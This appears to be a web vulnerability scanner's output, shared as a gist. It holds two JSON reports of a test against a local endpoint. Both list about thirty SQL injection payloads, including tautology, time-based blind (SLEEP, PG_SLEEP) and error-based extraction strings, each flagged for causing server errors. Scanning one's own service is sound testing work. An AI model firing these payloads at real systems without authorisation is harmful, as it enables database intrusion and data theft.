Created
June 17, 2016 18:41
report_by_test ("-s test") | |
{ | |
"errors": [], | |
"failures": { | |
"localhost:9000/test": { | |
"SQL_INJECTION_BODY": { | |
"POST - data:application/json|test": { | |
"500_errors": { | |
"confidence": "High", | |
"description": "This request returns an error with status code 501, which might indicate some server-side fault that could lead to further vulnerabilities", | |
"payloads": [ | |
"' or 'a'='a", | |
"' or 1=1 --", | |
"\" or \"a\"=\"a", | |
",(SELECT (CASE WHEN (1=1) THEN (SELECT 1 FROM PG_SLEEP(10)) ELSE 1/(SELECT 0) END))", | |
"AND ROW(1,2)>(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM (SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6)a GROUP BY x)", | |
"AND SLEEP(10)", | |
",(CAST('x'||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'x' AS NUMERIC))", | |
",ROW(1,2)>(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM (SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6)a GROUP BY x)", | |
"RLIKE (SELECT * FROM (SELECT(SLEEP(10)))x)", | |
"' union (select @@version) --", | |
",(SELECT 1 FROM(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)", | |
",(SELECT (CASE WHEN (1=1) THEN SLEEP(10) ELSE 1*(SELECT 1 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))", | |
"(SELECT 1 FROM(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)", | |
"; OR '1'='1'", | |
"') or ('a'='a", | |
"(CAST('x'||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'x' AS NUMERIC))", | |
"(SELECT 1 FROM PG_SLEEP(10))", | |
"AND EXTRACTVALUE(1,CONCAT('','x',(SELECT (ELT(1=1,1))),'x'))", | |
"AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)", | |
"(SELECT * FROM (SELECT(SLEEP(10)))x)", | |
"AND (SELECT * FROM (SELECT(SLEEP(10)))x)", | |
"(EXTRACTVALUE(1,CONCAT('','x',(SELECT (ELT(1=1,1))),'x')))", | |
"AND UPDATEXML(1,CONCAT('.','x',(SELECT (ELT(1=1,1))),'x'),2)", | |
"(SELECT (CASE WHEN (1=1) THEN SLEEP(10) ELSE 1*(SELECT 1 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))", | |
"AND ELT(1=1,SLEEP(10))", | |
"AND 1=CAST('x'||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'x' AS NUMERIC)", | |
"PROCEDURE ANALYSE(EXTRACTVALUE(1,CONCAT('','x',(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END)),'x')),1)", | |
"'/**/OR/**/1/**/=/**/1", | |
"a'b\"c'd\"", | |
"AND 1=(SELECT 1 FROM PG_SLEEP(10))" | |
], | |
"severity": "Low" | |
} | |
} | |
} | |
} | |
}, | |
"stats": { | |
"errors": 0, | |
"failures": 30, | |
"successes": 0 | |
} | |
} | |
report_by_issue ("-s issue") | |
{ | |
"errors": [], | |
"failures": { | |
"localhost:9000/test": { | |
"500_errors": { | |
"description": "This request returns an error with status code 501, which might indicate some server-side fault that could lead to further vulnerabilities", | |
"payloads": [ | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "AND EXTRACTVALUE(1,CONCAT('','x',(SELECT (ELT(1=1,1))),'x'))" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "AND UPDATEXML(1,CONCAT('.','x',(SELECT (ELT(1=1,1))),'x'),2)" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "AND ROW(1,2)>(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM (SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6)a GROUP BY x)" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "AND 1=CAST('x'||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'x' AS NUMERIC)" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "PROCEDURE ANALYSE(EXTRACTVALUE(1,CONCAT('','x',(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END)),'x')),1)" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "(SELECT 1 FROM(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "(EXTRACTVALUE(1,CONCAT('','x',(SELECT (ELT(1=1,1))),'x')))" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "(CAST('x'||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'x' AS NUMERIC))" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": ",(SELECT 1 FROM(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": ",ROW(1,2)>(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM (SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6)a GROUP BY x)" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": ",(CAST('x'||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'x' AS NUMERIC))" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "AND (SELECT * FROM (SELECT(SLEEP(10)))x)" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "AND SLEEP(10)" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "RLIKE (SELECT * FROM (SELECT(SLEEP(10)))x)" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "AND ELT(1=1,SLEEP(10))" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "AND 1=(SELECT 1 FROM PG_SLEEP(10))" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "(SELECT (CASE WHEN (1=1) THEN SLEEP(10) ELSE 1*(SELECT 1 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "(SELECT * FROM (SELECT(SLEEP(10)))x)" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "(SELECT 1 FROM PG_SLEEP(10))" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": ",(SELECT (CASE WHEN (1=1) THEN SLEEP(10) ELSE 1*(SELECT 1 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": ",(SELECT (CASE WHEN (1=1) THEN (SELECT 1 FROM PG_SLEEP(10)) ELSE 1/(SELECT 0) END))" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "a'b\"c'd\"" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "' or 'a'='a" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "\" or \"a\"=\"a" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "') or ('a'='a" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "'/**/OR/**/1/**/=/**/1" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "' or 1=1 --" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "' union (select @@version) --" | |
}, | |
{ | |
"confidence": "High", | |
"param": { | |
"location": "data", | |
"method": "POST", | |
"type": "application/json", | |
"variables": [ | |
"test" | |
] | |
}, | |
"string": "; OR '1'='1'" | |
} | |
], | |
"severity": "Low" | |
} | |
} | |
}, | |
"stats": { | |
"High": 0, | |
"Low": 1, | |
"Medium": 0 | |
} | |
} |